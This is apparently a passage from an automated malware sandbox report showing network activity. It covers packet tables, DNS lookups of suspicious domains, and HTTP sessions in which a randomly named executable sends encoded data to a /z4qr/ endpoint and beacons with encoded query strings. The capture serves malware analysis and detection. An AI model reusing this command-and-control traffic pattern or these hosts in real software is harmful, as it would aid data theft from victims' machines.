                                                      Dec 13, 2024 13:19:19.611952066 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.611991882 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612026930 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.612030983 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612148046 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612158060 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612180948 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.612238884 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.612248898 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612267017 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612319946 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.612441063 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.731861115 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.731885910 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.731955051 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.731969118 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.731981039 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.732002974 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.732019901 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.732157946 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.774883986 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.898953915 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:20.875353098 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:20.875376940 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:20.875432968 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:20.875518084 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:20.875576973 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:21.583723068 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:22.591777086 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:22.711689949 CET8049803199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:22.715290070 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:22.728226900 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:22.848022938 CET8049803199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:23.813772917 CET8049803199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:23.813800097 CET8049803199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:23.813930988 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:23.814110041 CET8049803199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:23.814157009 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:23.817579031 CET4980380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:23.937331915 CET8049803199.59.243.227192.168.2.24

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 13, 2024 13:17:13.335721970 CET6235253192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:09.822336912 CET6197253192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:10.818830967 CET6197253192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:10.846395016 CET53619721.1.1.1192.168.2.24
                                                      Dec 13, 2024 13:18:10.957381010 CET53619721.1.1.1192.168.2.24
                                                      Dec 13, 2024 13:18:27.604931116 CET5827353192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:28.116338968 CET53582731.1.1.1192.168.2.24
                                                      Dec 13, 2024 13:18:42.488060951 CET5307553192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:42.980770111 CET53530751.1.1.1192.168.2.24
                                                      Dec 13, 2024 13:18:58.116925001 CET5827353192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:18:58.855814934 CET53582731.1.1.1192.168.2.24
                                                      Dec 13, 2024 13:19:13.174992085 CET5307553192.168.2.241.1.1.1
                                                      Dec 13, 2024 13:19:13.880259037 CET53530751.1.1.1192.168.2.24

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 13, 2024 13:17:13.335721970 CET192.168.2.241.1.1.10x17dStandard query (0)srtb.msn.comA (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:09.822336912 CET192.168.2.241.1.1.10xe1d9Standard query (0)www.y6h6kn.topA (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:10.818830967 CET192.168.2.241.1.1.10xe1d9Standard query (0)www.y6h6kn.topA (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:27.604931116 CET192.168.2.241.1.1.10xa9a1Standard query (0)www.thesnusgang.funA (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:42.488060951 CET192.168.2.241.1.1.10x3c4dStandard query (0)www.telepzow.fitA (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:58.116925001 CET192.168.2.241.1.1.10x95efStandard query (0)www.dnft.immoA (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:19:13.174992085 CET192.168.2.241.1.1.10x6f28Standard query (0)www.deadshoy.techA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 13, 2024 13:17:13.473829985 CET1.1.1.1192.168.2.240x17dNo error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)false
                                                      Dec 13, 2024 13:17:13.473829985 CET1.1.1.1192.168.2.240x17dNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Dec 13, 2024 13:18:10.846395016 CET1.1.1.1192.168.2.240xe1d9No error (0)www.y6h6kn.top103.23.149.28A (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:10.846395016 CET1.1.1.1192.168.2.240xe1d9No error (0)www.y6h6kn.top162.251.95.62A (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:10.957381010 CET1.1.1.1192.168.2.240xe1d9No error (0)www.y6h6kn.top103.23.149.28A (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:10.957381010 CET1.1.1.1192.168.2.240xe1d9No error (0)www.y6h6kn.top162.251.95.62A (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:28.116338968 CET1.1.1.1192.168.2.240xa9a1No error (0)www.thesnusgang.funthesnusgang.funCNAME (Canonical name)IN (0x0001)false
                                                      Dec 13, 2024 13:18:28.116338968 CET1.1.1.1192.168.2.240xa9a1No error (0)thesnusgang.fun84.32.84.32A (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:42.980770111 CET1.1.1.1192.168.2.240x3c4dNo error (0)www.telepzow.fit172.67.155.214A (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:42.980770111 CET1.1.1.1192.168.2.240x3c4dNo error (0)www.telepzow.fit104.21.64.208A (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:18:58.855814934 CET1.1.1.1192.168.2.240x95efNo error (0)www.dnft.immo94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                      Dec 13, 2024 13:18:58.855814934 CET1.1.1.1192.168.2.240x95efNo error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                      Dec 13, 2024 13:19:13.880259037 CET1.1.1.1192.168.2.240x6f28No error (0)www.deadshoy.tech199.59.243.227A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.y6h6kn.top
                                                      • www.thesnusgang.fun
                                                      • www.telepzow.fit
                                                      • www.dnft.immo
                                                      • www.deadshoy.tech

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.2449777103.23.149.28806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:18:10.985869884 CET438OUTGET /jv64/?BTV4RR_=0rgj4Y9sgnjazUN/4YnNawpmVeS/0BjNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7w9E5vaK255EpQhtC5dNFByAd90Z0uMBeXk0=&Tr=F0udvf HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.y6h6kn.top
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Dec 13, 2024 13:18:12.562987089 CET312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 12:18:12 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "674427dd-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.244978184.32.84.32806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:18:28.271305084 CET719OUTPOST /z4qr/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 204
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.thesnusgang.fun
                                                      Origin: http://www.thesnusgang.fun
                                                      Referer: http://www.thesnusgang.fun/z4qr/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 34 62 78 41 73 39 57 49 63 7a 4a 6e 6a 65 78 77 47 70 30 76 65 57 6d 50 32 43 42 37 74 46 57 77 61 69 6a 44 37 33 4b 4c 61 45 48 2f 35 41 57 76 6f 53 79 7a 61 61 38 7a 76 37 57 62 4f 69 48 74 49 70 30 42 74 6b 30 53 39 76 70 4c 70 6f 71 6b 30 74 67 5a 76 53 57 4b 64 5a 76 33 75 51 49 72 36 38 54 32 61 31 61 51 58 64 46 37 46 6c 4c 53 33 45 63 2b 74 6b 78 37 77 4e 67 42 37 6b 4f 49 55 44 77 34 77 4d 67 67 70 2f 48 4e 30 2b 75 31 71 48 31 59 75 44 70 2b 76 38 77 65 77 56 57 42 59 45 62 48 35 54 64 62 66 74 6f 69 48 67 33 34 6f 44 6a 62 2f 64 67 35 63 6a 72 50 66 6a 38 53 5a 41 3d 3d
                                                      Data Ascii: BTV4RR_=4bxAs9WIczJnjexwGp0veWmP2CB7tFWwaijD73KLaEH/5AWvoSyzaa8zv7WbOiHtIp0Btk0S9vpLpoqk0tgZvSWKdZv3uQIr68T2a1aQXdF7FlLS3Ec+tkx7wNgB7kOIUDw4wMggp/HN0+u1qH1YuDp+v8wewVWBYEbH5TdbftoiHg34oDjb/dg5cjrPfj8SZA==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.244978584.32.84.32806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:18:30.945507050 CET1091OUTPOST /z4qr/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 576
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.thesnusgang.fun
                                                      Origin: http://www.thesnusgang.fun
                                                      Referer: http://www.thesnusgang.fun/z4qr/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 34 62 78 41 73 39 57 49 63 7a 4a 6e 69 38 6c 77 45 4b 63 76 53 6d 6d 4f 36 69 42 37 6a 6c 58 59 61 69 76 44 37 32 2b 62 61 33 7a 2f 35 69 2b 76 70 54 79 7a 64 61 38 7a 6e 62 57 61 44 43 48 7a 49 70 6f 57 74 6e 73 53 39 72 4a 4c 71 37 69 6b 31 4e 68 72 79 69 57 4c 56 35 76 45 34 67 4a 72 36 38 54 45 61 31 61 41 58 63 4a 37 44 56 72 53 79 31 63 2b 74 6b 78 39 36 74 67 53 32 45 4f 54 55 44 34 6b 77 49 35 37 70 39 54 4e 30 59 65 31 6d 58 31 62 6c 44 70 36 6b 63 77 41 30 77 76 62 42 69 4c 4d 67 52 4d 4a 53 4f 6b 42 4d 52 2f 37 6b 69 69 74 38 75 39 75 41 6c 65 65 62 47 42 64 4c 49 6f 6d 4b 76 6d 62 41 6f 55 45 34 4f 74 47 58 48 68 34 63 2b 43 53 4f 6f 33 64 31 47 44 45 2b 66 66 67 58 52 46 7a 47 50 78 6f 6e 50 4b 59 42 64 44 64 51 79 4e 74 68 48 4e 52 4d 66 6c 4f 79 57 6c 39 57 35 72 6f 31 4d 49 4e 37 52 6a 6a 35 79 61 76 74 75 71 42 4f 67 4a 4b 36 6c 49 79 43 44 51 78 66 61 34 63 63 74 34 47 39 57 58 75 4e 2b 76 66 4a 44 4c 6b 42 34 72 4b 43 36 37 64 49 6f 45 78 56 50 58 41 51 48 [TRUNCATED]
                                                      Data Ascii: BTV4RR_=4bxAs9WIczJni8lwEKcvSmmO6iB7jlXYaivD72+ba3z/5i+vpTyzda8znbWaDCHzIpoWtnsS9rJLq7ik1NhryiWLV5vE4gJr68TEa1aAXcJ7DVrSy1c+tkx96tgS2EOTUD4kwI57p9TN0Ye1mX1blDp6kcwA0wvbBiLMgRMJSOkBMR/7kiit8u9uAleebGBdLIomKvmbAoUE4OtGXHh4c+CSOo3d1GDE+ffgXRFzGPxonPKYBdDdQyNthHNRMflOyWl9W5ro1MIN7Rjj5yavtuqBOgJK6lIyCDQxfa4cct4G9WXuN+vfJDLkB4rKC67dIoExVPXAQHSkulapLdzp8Hb12X+bmKlZciGU9Y2SHVX+CYj5rljxy1aYD77ojvY6Q3x8nUzYGI4nkEKAslgzb4RrklgJTewFzuBAokyOn2Wm5ujN7CJ1CDDTAPM7PLfR2u5oD3i348vs2o0l/n0g5kwQYIkyw0xnbxudccmsV9TS8hNHLBwWEmkXn5mKFhh9u9LQECh50U//pA6xQaifqBlGZATGi6gloEdsPxViOxTdoUCKLsmZzSk=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.244978684.32.84.32806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:18:33.608782053 CET12360OUTPOST /z4qr/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 45184
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.thesnusgang.fun
                                                      Origin: http://www.thesnusgang.fun
                                                      Referer: http://www.thesnusgang.fun/z4qr/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 34 62 78 41 73 39 57 49 63 7a 4a 6e 69 38 6c 77 45 4b 63 76 53 6d 6d 4f 36 69 42 37 6a 6c 58 59 61 69 76 44 37 32 2b 62 61 32 4c 2f 35 7a 65 76 70 30 6d 7a 63 61 38 7a 74 37 57 66 44 43 47 32 49 70 77 61 74 67 6b 6b 39 74 46 4c 7a 4b 53 6b 79 75 4a 72 6b 43 57 45 5a 5a 76 30 75 51 4a 76 36 38 44 79 61 30 4c 39 58 64 74 37 46 7a 6e 53 31 30 63 39 69 45 78 37 77 4e 67 4e 37 6b 4f 6f 55 44 6f 67 77 49 46 37 71 4e 50 4e 30 61 36 31 6d 47 31 62 6d 6a 70 36 30 63 78 4b 39 51 72 71 42 69 4c 49 67 51 70 63 54 39 73 42 4d 43 62 37 74 53 69 73 36 65 39 53 42 6c 66 62 4b 57 42 61 4c 4a 4d 6d 4b 72 32 62 41 2f 67 45 35 76 4e 47 46 58 68 35 56 65 43 53 42 49 33 50 37 6e 2b 77 2b 66 65 58 58 54 70 4a 47 4f 68 6f 31 61 32 59 4c 34 2b 76 53 53 4d 66 69 48 4e 66 42 2f 6c 45 79 57 35 48 57 35 7a 6f 31 59 6f 4e 37 68 7a 6a 39 31 4f 6f 71 2b 71 4d 42 41 4a 49 77 46 46 57 43 44 49 31 66 62 59 79 66 65 77 47 39 56 2f 75 62 50 76 66 65 44 4c 6b 44 34 72 41 66 71 37 59 49 6f 45 78 56 50 37 41 52 77 [TRUNCATED]
                                                      Data Ascii: BTV4RR_=4bxAs9WIczJni8lwEKcvSmmO6iB7jlXYaivD72+ba2L/5zevp0mzca8zt7WfDCG2Ipwatgkk9tFLzKSkyuJrkCWEZZv0uQJv68Dya0L9Xdt7FznS10c9iEx7wNgN7kOoUDogwIF7qNPN0a61mG1bmjp60cxK9QrqBiLIgQpcT9sBMCb7tSis6e9SBlfbKWBaLJMmKr2bA/gE5vNGFXh5VeCSBI3P7n+w+feXXTpJGOho1a2YL4+vSSMfiHNfB/lEyW5HW5zo1YoN7hzj91Ooq+qMBAJIwFFWCDI1fbYyfewG9V/ubPvfeDLkD4rAfq7YIoExVP7ARwqk8A2pc+Lo+3b343/LmKhIciaM9dbXAmD+CvL5vXLwx1afJb7+nvkFQzZCnWHYGc0nqVKApSUyTYRnsFgGe+wJzu16okXVnFCm5uTN7CJ1CDDVDPMFPLfd2u5kD36d48ns2pkl/kMj/Ex3QokCpkx8bwGKccW8WKPS8VRHKBwRJ2lQn5mXIBgNu8/iEBxp0H3/pFqxIry/8zR5bSCm7JomtmFCCh50RBrB2HXBe5+IuWj69asvD25BpUVHz+W74imb8JeHaFqDPsWeD832OgMnniS9K8jiSS6q66t6WGiujSiEsRfSrpBu2JmKFq+6rTrGPr53AELtXWWB7rxu9iLolBfrHF0hQhhaqFJGadGZEhF937nhx36Voz3Jb9xEBCgIYaKw7JvqpJt5nr932ov2kU1aEU02QkhIk8jLMyt+9/puA23EBRYpJTLIxt9hQVqDjFX2Hj4X9By+7NbEBk0IzAryu37Y+IGb+O6RXb1izB4ijikPW/z/RN5g4mOQUlyUz9DQtn13dPFeRLkCXErZfzJ6Ab5v8LlHrgtRb4lOnAyUjrqjnfO/BNsmrWwPN77yWI4Vz+j8HU8J5WggPRd9oqoMbbCbRdXiwS5+Uyfulkix96ZKqxN5ai+YljAc3Dgh9bQ1QMxg1qkpjD2+URYDlqxbvqHGm7QC [TRUNCATED]
                                                      Dec 13, 2024 13:18:33.730010033 CET12360OUTData Raw: 6e 2f 49 35 77 36 61 4b 53 50 64 59 65 43 79 47 36 49 67 59 68 75 5a 6f 2b 58 5a 4c 6e 72 6c 4c 6b 64 36 4c 69 34 2f 75 61 79 4a 4e 6e 66 34 76 62 79 77 68 70 6b 35 51 33 62 43 74 4f 73 73 70 48 6a 47 33 72 4f 72 44 71 77 54 4b 75 73 69 6a 79 6a
                                                      Data Ascii: n/I5w6aKSPdYeCyG6IgYhuZo+XZLnrlLkd6Li4/uayJNnf4vbywhpk5Q3bCtOsspHjG3rOrDqwTKusijyja4GL3Qml9+yoKSR5zGGtAcJqoSw8Xs4BL4X7oQdgwsP4ZPQURXgT0rruNNV4R4IaNvxPtO5/VI/cufn22ZMn2pE+8TRgQM1+pAHEVlNv0C1cFnun5ZNFYWv6HtYMEE318GzOgzJNnUDominVJHI27vQy3tKUnwVWC
                                                      Dec 13, 2024 13:18:33.730194092 CET7416OUTData Raw: 66 37 68 30 43 35 31 50 63 46 5a 6c 42 61 33 41 70 65 6f 38 57 6a 75 70 7a 78 71 51 65 52 44 62 43 73 49 41 2b 6c 37 67 72 77 46 64 5a 6c 49 4a 75 62 79 59 7a 42 65 42 35 55 59 52 69 73 77 70 6b 6c 7a 69 33 58 73 68 35 66 77 45 4a 5a 54 49 75 2b
                                                      Data Ascii: f7h0C51PcFZlBa3Apeo8WjupzxqQeRDbCsIA+l7grwFdZlIJubyYzBeB5UYRiswpklzi3Xsh5fwEJZTIu+bARCDfxyrIWKCmfoupRx1an6bn7eylSG9U6xgBsxi5lJFojNlrFDvQq5sSu6iL6W84+ga5dOAChF2fGSjdUEIKOl+79fITExHdn9yKTiW6rGkNZ1Y1sl9vo5jfW7eZppR661Yzngip7sAC55vSJUyz9pebgWpfY+o
                                                      Dec 13, 2024 13:18:33.730423927 CET4944OUTData Raw: 4b 75 37 57 59 47 7a 37 6b 6d 75 36 33 6d 6e 37 56 6e 78 70 79 7a 59 59 79 58 37 36 56 4c 64 70 59 39 64 43 6d 59 4e 50 50 72 2b 79 46 78 67 79 6d 38 57 62 78 2b 4b 74 38 7a 74 6b 58 4f 45 64 37 37 76 4e 46 77 36 76 44 36 42 48 79 4a 66 7a 63 47
                                                      Data Ascii: Ku7WYGz7kmu63mn7VnxpyzYYyX76VLdpY9dCmYNPPr+yFxgym8Wbx+Kt8ztkXOEd77vNFw6vD6BHyJfzcGGqVT76ds+nKW9WWBMJ4MZ0uPDskikmCQV3+o07q8r4f5UNZghkGjXedl1WgruaBkevgIS+EIQslVN4K6krPFonCI5Qw5zaLVNOBpI1jSShfzZ6IkLp1MGOdU2qo3dI0ge62VBh6Qdwtzg7DwO89sBR2sctRiH18X4
                                                      Dec 13, 2024 13:18:33.850193977 CET2472OUTData Raw: 74 52 30 6d 51 4a 52 34 51 71 5a 37 34 62 79 71 6a 64 4d 41 36 49 51 6b 74 44 6c 5a 58 2b 2b 6c 73 59 69 78 2f 7a 38 31 7a 70 43 44 76 72 53 2f 4d 6b 66 67 6f 30 44 4c 70 57 50 64 34 36 47 48 63 56 6c 53 38 2b 49 41 55 6f 58 61 6f 4e 65 77 56 39
                                                      Data Ascii: tR0mQJR4QqZ74byqjdMA6IQktDlZX++lsYix/z81zpCDvrS/Mkfgo0DLpWPd46GHcVlS8+IAUoXaoNewV9nbKpU0zj2mG7zWa8qxjWIqF+xaLC6Zs9VJmMQL+K+us35XDorMsMv7mROSgMWqiW9MYbXuL6PVxGXnl1Y04MXTYCReLYeVOLbgOCnn2fgZ87UARIpISCuLTo6IYEcVyxK4X8FjZCFaCr08VhfKNb5IqxZtuTEcTuD
                                                      Dec 13, 2024 13:18:33.850233078 CET2472OUTData Raw: 54 49 38 4d 50 6e 2f 75 41 37 46 6c 6c 67 4d 5a 44 58 6e 73 38 44 58 53 78 2b 30 61 47 47 56 44 36 63 33 4f 73 33 37 6b 68 36 46 6f 43 72 68 62 54 73 35 4b 47 67 68 64 41 42 71 44 32 59 6b 74 34 70 42 73 64 4e 30 56 30 39 42 49 68 6b 6a 63 43 68
                                                      Data Ascii: TI8MPn/uA7FllgMZDXns8DXSx+0aGGVD6c3Os37kh6FoCrhbTs5KGghdABqD2Ykt4pBsdN0V09BIhkjcCh9/e7ReQME5zYvL+oMWj4V8cBAHHHV4MzVHgkrHoQs0Aq8orZs3aBGgGvMmzwtKhk4IbrRvW7yDy5COCUqk7vR9PKiYHS/Er2vwLoDeT0cpV9BU2LjUtyxQSKQAqW2NvQ7GCHDebF5/FoiXcl+6bj1WzPd0KdAO4gG
                                                      Dec 13, 2024 13:18:33.850250959 CET2472OUTData Raw: 69 7a 43 44 42 4c 76 58 31 38 53 41 41 76 62 75 76 76 64 61 6f 79 4d 6c 61 47 4f 45 4e 49 41 35 72 32 74 59 6b 47 47 71 56 56 74 47 38 38 77 73 44 65 67 73 7a 4f 73 4d 75 79 59 67 44 48 53 54 2b 55 47 6d 54 31 75 30 41 72 70 38 4c 46 32 2f 38 65
                                                      Data Ascii: izCDBLvX18SAAvbuvvdaoyMlaGOENIA5r2tYkGGqVVtG88wsDegszOsMuyYgDHST+UGmT1u0Arp8LF2/8exUgAwPXrcqTCAE/f/gak7iCbGJXlGj6QGphZ21iIgadYcYXyUtcT2LGVDkPqLYCeGGxPYMMkVE+KWKG2G3ILAsUKUycyKa0quoXO/vICv0v0UrMzQlf45F5+iozEM5ijyiQvVMdPRpNRNjFdkqFZY1slC4BlE6g0q
                                                      Dec 13, 2024 13:18:33.850294113 CET1205OUTData Raw: 70 44 32 73 77 33 6f 30 69 76 70 77 42 50 32 66 50 2b 78 74 45 2b 41 61 50 68 45 4c 48 7a 70 72 48 63 75 74 75 6a 47 4e 39 76 6c 56 76 34 31 67 4b 59 31 5a 61 4d 4f 51 2f 6e 46 46 6a 59 71 63 47 6f 6b 63 63 63 45 4f 58 51 2f 45 45 31 39 79 49 51
                                                      Data Ascii: pD2sw3o0ivpwBP2fP+xtE+AaPhELHzprHcutujGN9vlVv41gKY1ZaMOQ/nFFjYqcGokcccEOXQ/EE19yIQ4gsSckDj/7PkMxLpCMeGuvtWz1S1Z5NTfIyRhBVmxD7KaEzYfWIc5aEx3QHFy1FTyT602F2kIu//uc73ZFzmYG4YoBTl17nCtUlO36LXBPR9sEnJvH+RhFpY95u1eteG46S/fu+nTWC8uuAJKdTEBR0JEFPfAlzkg


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.244978884.32.84.32806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:18:36.288033009 CET443OUTGET /z4qr/?BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvf HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.thesnusgang.fun
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Dec 13, 2024 13:18:37.445281982 CET1236INHTTP/1.1 200 OK
                                                      Date: Fri, 13 Dec 2024 12:18:37 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 9973
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Server: hcdn
                                                      alt-svc: h3=":443"; ma=86400
                                                      x-hcdn-request-id: 4608d3c17ea731b2effb1c4c4560a1f7-bos-edge4
                                                      Expires: Fri, 13 Dec 2024 12:18:36 GMT
                                                      Cache-Control: no-cache
                                                      Accept-Ranges: bytes
